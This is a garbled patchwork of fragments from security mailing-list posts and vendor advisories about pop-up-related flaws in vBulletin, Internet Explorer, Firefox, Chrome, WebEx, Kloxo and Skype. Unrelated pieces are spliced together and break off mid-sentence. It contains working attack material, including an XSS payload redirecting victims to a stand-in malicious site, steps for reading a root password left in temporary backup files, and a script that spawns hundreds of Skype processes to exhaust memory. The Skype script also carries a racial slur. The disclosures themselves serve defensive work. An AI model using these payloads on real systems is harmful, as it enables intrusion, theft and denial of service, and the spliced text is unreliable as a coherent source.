This is a Cross Site Scripting (XSS) vulnerability in the vBulletin
community forum software. In order to exploit this flaw the following
option needs to be activated:
'http://victim/vBulletin/profile.php?do=editoptions' (Show New Private
Message Notification Pop-Up enabled). There are many forums with this
option enabled by default for all new users.
The title is not being encoded in the following rendered HTML code:
Ok, I'm missing it, what exactly is the spoof here? When the popup comes up
for me, the address of the page is
http://www.google.com.ar/#www.microsoft.com and I see in the address bar
#www.microsoft.com.
If I'm understanding the wording below correctly, it's because the # keeps
the browser from interpreting Microsoft.com and thus giving a bad URL, and
presumably, the browser cannot or does not have the ability to show the full
address (and perhaps in other browsers or scenarios people don't see the #
like I did - and also don't realize that the browser always prefixes its
===============================ADVISORY===============================
Description:
------------
A malicious web page can extract all the data stored within the autocomplete history of a user's Firefox browser. The web page must convince a user to hold down the left or right-arrow keys; then the contents of the autocomplete popup can be read. This may include the search history box within the browser, or other personal details.
Analysis
--------
A malicious web page can be created that includes a text field with the same 'name' attribute as data entered on other sites (e.g. 'q' for Google). The form autocompletion popup in Firefox can then be triggered and manipulated by a variety of key presses. For example, by pressing the 'a' key, autocomplete entries starting with that letter will be shown. Entries in the popup can be selected by using the up/down arrow keys. When the left or right arrow key is pressed, the currently selected entry from the popup is entered into the text field and can be read through JavaScript.
Hello, how are you? This time I am writing to let you know of a "spoofing" vulnerability in Internet Explorer 7.0 (tested on 8.0, where it does not work).
Creating a malformed pop-up can put any address in the address bar with any page or content in the body.
This flaw is possible because if in the address bar we put, for example:
address # address
the hash (#) means the first address is the one that is loaded, and what comes after the hash does not interfere with the original page. This is why, by creating a popup with the special dimensions and trying to pass it off as such, the popup displayed the end of the address and did not show the address that was actually running. (The special dimensions are important, because if it is larger it does not work.)
Just a single click in the body of the popup reveals the true address, which could equally be dodged with a JavaScript event like onblur or onfocus. Anyway, that is more a serious attack than a proof of concept.
> redirected:
>
> https://webmail.domain.tld/owa/redir.aspx?
> C=efb6ad0a2be24a368596c275b5e4ae8d&URL=http%3a%2f%2fwww.csnc.ch%2f
>
> Still, if we leave it away, it's only a pop-up which is clicked
> away and the redirection is still done.
>
> If the user is not logged on when he clicks on the specially crafted
> URL, he is also redirected to the logon screen and redirected after
> successful login (including the warning pop-up):
Dear w0lfd33m:
It does not fail in Firefox; you have misunderstood the failure.
The flaw is not that both addresses have the hash (#); it is that when you create a popup of this small size, the end of the full address is shown, and the hash only makes what comes after it irrelevant to the first address. Then, by creating the popup so that only the end of the address is visible, the address shown is the false one, and that is the flaw. This only works in Internet Explorer.
Greetings.
https://<servername>.webex.com/.
2. Select Assistant on the left side of the page.
3. Select the Support link.
4. Select the Version link, which is displayed on the right side of
the top of the page.
5. The Client Build version is displayed in a pop-up window.
There is currently no fixed version for the WBS 25-based WebEx
meeting service. This section of the Security Advisory will be
updated when fixed version information is available.
Hi
This article deals with the latest third party popup attacks that are
performed by an attacker from the rogue
and vulnerable links of the web sites to circumvent the normal
functioning on the web. The target website
always seems to be the liable web provider from where the popup attacks
are possible. It also discusses
other problems related with Pop Ups.
> Great admirer of your work :) I just wanted to inform you that I have
> tested your claim, on a fully patched/updated Win XP SP2 system with an
> admin account logged in, and was warned sufficiently(asked whether I
> wanted to play asx files, then asked if I was sure by Media Player, then
> pop-up was blocked by IE), while the page you tried to produce was
> blocked via IE's pop-up blocker.
>
> You can see/confirm this by viewing these screenshots:
>
> http://preview.tinyurl.com/34xpcz
> [mailto:full-disclosure-bounces@lists.grok.org.uk] On Behalf Of Aditya K
> Sood
> Sent: 17 August 2007 09:07
> To: full-disclosure@lists.grok.org.uk; bugtraq@securityfocus.com;
> websecurity@webappsec.org; Steven M. Christey
> Subject: [Full-disclosure] SecNiche : Microsoft Internet Explorer Pop up
> Blocker Bypassing and Dos Vulnerability
>
> Advisory : Microsoft Internet Explorer Pop up Blocker Bypassing and Dos
> Vulnerability
>
======================================================================
Secunia Research 26/01/2010
- Google Chrome Pop-Up Block Menu Handling Vulnerability -
======================================================================
Table of Contents
Affected Software....................................................1
Advisory : Microsoft Internet Explorer Pop up Blocker Bypassing and Dos
Vulnerability
Dated : 15 August 2007
Severity : Critical
Explanation :
The vulnerability persists in the popup blocker functioning to allow
10. In the Distribution medium enter the full path to the
'ingres.tar' file (including the file) (See step 4).
11. Choose PackageInstall from the list of installation options
and then choose 'Stand alone DBMS Server' from the list of
packages. Then choose ExpressInstall.
12. Choose Yes in the pop-up screen and press Enter key.
The install utility verifies that each component was
transferred properly from the distribution medium. When this
is finished (without errors), another pop-up screen for
setting up the components comes up.
13. Select Yes and press Enter key to go to the Setup program.
Customer%20Analysis&action=CustomerLifeTimeOrders.xaction
Cookie: JSESSIONID=85740C182994F78946BE8A38605396B1
Cookie2: $Version=1
Proxy-Connection: Keep-Alive
When the request is executed, a popup showing the string Pwnd can be seen.
Here is the response:
HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
X-Powered-By: Servlet 2.4; JBoss-4.2.1.GA (build: SVNTag=JBoss_4_2_1_GA
sable_reason";s:0:"";s:11:"createstage";s:0:"";s:13:"createmessage";s:0:"";s:12:"rootpassword";s:21:"xxxxxxxxxxxxxxxxxxxx";s:20:"rootpassword_changed";s
So in summary, here are the exploitation steps:
1. Log into HyperVM/Kloxo
2. Click "Backup Home"
3. In the field labeled "Restore from file", browse for any restore file from the popup box.
4. Wait till the VM has finished restoring from backup.
5. Login. If the root user hasn't deleted these files from /tmp/backupXXXXX before bringing up the network interface, you win.
Mitigation:
After the VM is restarted, manually delete these files as the root user before anyone else reads them.
http://www.victim.com/cart_save.php?operation=save&rnd=&rp=products.php&cart_name=<html><script>window.location="http://malicious-site.com";</script></html>
Then when the user visits "My Saved Carts" at
http://victim.com/user_carts.php the code is executed:
Example 1 would give a link to the Google search engine.
Example 2 would give a javascript alert popup displaying "VULN".
Example 3 would send the user to a malicious site.
Note: manuals_search.php is also vulnerable to the same
HTML/Javascript vulnerability that allows for arbitrary code to
be executed:
The value of the "src" attribute will not be recognized by the filtering
attempts following the decoding in the cleanHTML() function.
A message with such an image tag in the body will trigger the JavaScript
and open a popup box if the browser supports "javascript:" attribute
values in image elements' "src" attributes. This particular proof of
concept works with Internet Explorer 6, the newest Firefox will not
execute the JavaScript.
>> launching other applications such as: Maps, YouTube, and iTunes.
>> Launching these applications can be achieved through loading special
>> URLs using the meta refresh tag. This is shown in the second
>> proof-of-concept exploit below.
>>
>> We also discovered that the bug can also be triggered through popup
>> windows (e.g. javascript alert). In this situation the initiating app
>> does not need to be termianted in order to active the call.
>>
>> Finally, we discovered a second bug that can be used to perform
>> malicious phone calls that cannot be prevented or canceled by the
decrease or eliminate the risks of reading your email (viruses,
javascript, webbugs, etc). POP Peeper can be run from a
portable device and can be password protected. Many notification options
are available to indicate when new mail has
arrived, such as sound alerts (configurable for each account), flashing
scroll lock, skinnable popup notifier, customized
screensaver and more."
Source: http://www.poppeeper.org
-------------------------------------------------------------------------------------------------------------------------
> setting focus on each other, you can force the user to quit the
> browser and eventually crash it if the user holds the enter key when a
> javascript alert window appears.
>
> This bug seems to be fixed in Internet Explorer 7, Microsoft seems to
> have added a counter that limits the number of consecutive pop-up
> alerts.
> A variation of that bug has been reported to firefox a few years ago
> (see related file), but seems to never have been posted on official
> security channels.
>
Mozilla developer Justin Dolske reported that the new asynchronous
Authorization Prompt (HTTP username and password) was not always
attached to the correct window. Although we have not demonstrated
this, it may be possible for a malicious page to convince a user
to open a new tab or popup to a trusted service and then have the
HTTP authorization prompt from the malicious page appear to be the
login prompt for the trusted page. This potential attack is greatly
mitigated by the fact that very few web sites use HTTP authorization,
preferring instead to use web forms and cookies (CVE-2010-0172).
Security issues were identified and fixed in firefox:
An unspecified function in the JavaScript implementation in Mozilla
Firefox creates and exposes a temporary footprint when there is
a current login to a web site, which makes it easier for remote
attackers to trick a user into acting upon a spoofed pop-up message,
aka an in-session phishing attack. (CVE-2008-5913).
The JavaScript implementation in Mozilla Firefox 3.x allows remote
attackers to send selected keystrokes to a form field in a hidden
frame, instead of the intended form field in a visible frame, via
>
> > it turns out, Outlook is doing nothing close to what I feared.
> > Basically, the second instance sees that another Outlook window is
> > running in the same interactive logon space, and when it starts, it
just
> > calls another popup in the previous Outlook space and then terminates
> > itself (that's close enough, anyway). The good news is that there is
no
> > "user hopping" or "boundary crossing" here.
>
> Sounds comparable to what the Windows Explorer does when
--On November 1, 2007 3:36:00 PM -1000 Peter Besenbruch <prb@lava.net>
wrote:
>
> Firefox throws up a download dialog, asking what I should do
> with "prettyyoungthing.rpm," while a Javascript pop-up explains that to
> see these great images, I need to save the file, and type "rpm -i
> prettyyoungthing.rpm," and that I need to do it as root.
There is no need to do that. In both Macs and Gnome or KDE on Unix, if
you try to run rpm -i (of whatever the install paradigm is on your flavor
1. Skype and Internet Explorer uri handler mechanism memory resources consumption bug:
<script>
// Repeatedly open and immediately close a window pointed at a skype: URI.
// Each open hands the URI to the registered handler, which starts skype.exe.
for (var x = 1; x <= 666; x++)
{
popup_window = window.open('skype:happy_negro?call');
popup_window.close();
}
</script>
This will invoke many skype.exe processes and, as they are not closed, much memory will be consumed. Such a script will be blocked by the popup blocker, so it is possible to do it another way: